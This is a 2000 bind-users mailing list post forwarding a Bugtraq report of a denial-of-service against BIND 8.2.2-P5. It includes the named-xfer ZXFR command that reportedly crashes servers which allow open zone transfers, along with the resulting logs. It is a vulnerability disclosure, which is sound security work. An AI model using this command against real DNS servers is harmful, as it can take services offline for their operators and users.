Fwd: BIND 8.2.2-P5 Possible DOS

Alec.Barea at sita.int Alec.Barea at sita.int
Fri Nov 10 15:56:03 UTC 2000 




For those who doesn't want to read bugtraq or doesn't have time, here's the mail
about the new DOS.

I've tried it on OpenBSD 2.7 with bind 8.2.2p6 and it works pretty well...

>
>Hi,
>playing with bind and ZXFR feature ( zone transfer compressed with a possible
insecure
>execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind
8.2.2-P5 .
>
>By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define
it with #define BIND_ZXFR
>so it will refuse any ZXFR transfer, because it doesn't support it.
>But now what appens? Look here...
>
>################################
>zone to transfer: zone.pippo.com
>dns server:       dns.pippo.com 192.168.1.1
>me:               naif.gatesux.com 10.10.10.10
>I send a Zone Trasnfer request using "-Z" switch with means that i wish to use
ZXFR.
>dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured,
so everyone
>could ask him for *.zone.pippo.com ...
>
><naif at naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com
-d 9 -f pics -Z dns.pippo.com
>named-xfer[29297]: send AXFR query 0 to 192.168.1.1
>named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
>
>On the server's log:
>Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from
[10.10.10.10].2284 for "zone.pippo.com"
>Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of
"zone.pippo.com" (IN) to [10.10.10.10].2284
>
>Then the server "*** CRASHED ***" .
>
>I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and
confirm this kind of dos)
>and bind-9.0.0 has no support for ZXFR .
>
><naif at naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc
-l
>    234
><naif at naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' |
wc -l
>      0
>
>A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they
are dossable...
>
>
>naif
>naif at itapac.net


-----------------------------------------------------------------------------------------

      Alec Barea
      UNIX System Administrator / DNS specialist
      SITA / EQUANT
      alec.barea at sita.int
      Tel:  +1 514 847-3436
      Fax: +1 514 847-3400

More information about the bind-users mailing list